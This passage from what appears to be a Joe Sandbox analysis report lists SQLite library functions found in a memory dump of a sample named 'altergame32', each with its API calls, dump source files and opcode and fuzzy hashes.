                                                                  • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                  • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                  Function 60961389 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                  • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                  • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                  • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                  • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                  • String ID:
                                                                  • API String ID: 3091402450-0
                                                                  • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                  • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                  • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                  • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                  Function 60939097 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                  • String ID:
                                                                  • API String ID: 251237202-0
                                                                  • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                  • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                  • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                  • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                  Function 6091A2E8 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                  • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                  • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                  • String ID:
                                                                  • API String ID: 4225432645-0
                                                                  • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                  • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                  • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                  • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                  Function 609441F6 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: ($string or blob too big$|
                                                                  • API String ID: 632333372-2398534278
                                                                  • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                  • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                  • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                  • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                  Function 6096D170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Protect$Query
                                                                  • String ID: @
                                                                  • API String ID: 3618607426-2766056989
                                                                  • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                  • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                  • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                  • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                  Function 60928335 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                    • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                  • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                  • sqlite3_free.SQLITE3 ref: 609283B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                  • String ID: d
                                                                  • API String ID: 211589378-2564639436
                                                                  • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                  • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                  • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                  • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                  Function 60901184 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                  • API String ID: 1646373207-2713375476
                                                                  • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                  • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                  • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                  • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                  Function 609292DA Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                  • String ID:
                                                                  • API String ID: 1648232842-0
                                                                  • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                  • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                  • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                  • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                  Function 60961492 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_step.SQLITE3 ref: 609614AB
                                                                  • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                  • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                  • String ID:
                                                                  • API String ID: 3429445273-0
                                                                  • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                  • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                  • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                  • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                  Function 609034B2 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                  • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                  • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                  • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1477753154-0
                                                                  • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                  • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                  • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                  • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                  Function 6092A43E Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                    • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                  • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 2673540737-0
                                                                  • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                  • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                  • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                  • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                  Function 6092A3C4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                  • String ID:
                                                                  • API String ID: 3526213481-0
                                                                  • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                  • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                  • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                  • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                  Function 60969133 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                  • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                    • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                  • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                    • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                  • sqlite3_step.SQLITE3 ref: 60969197
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                  • String ID:
                                                                  • API String ID: 2877408194-0
                                                                  • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                  • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                  • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                  • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                  Function 609084D1 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                  • String ID:
                                                                  • API String ID: 1477753154-0
                                                                  • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                  • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                  • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                  • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                  Function 609481BF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                  • Associated: 00000006.00000002.3049381408.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049450262.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049470005.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049490074.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049508003.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000006.00000002.3049525902.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_60900000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: sqlite3_log
                                                                  • String ID: into$out of
                                                                  • API String ID: 632333372-1114767565
                                                                  • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                  • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                  • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                  • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                  Function 60919123 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                  • sqlite3_free.SQLITE3 ref: 609193A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3049400617.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
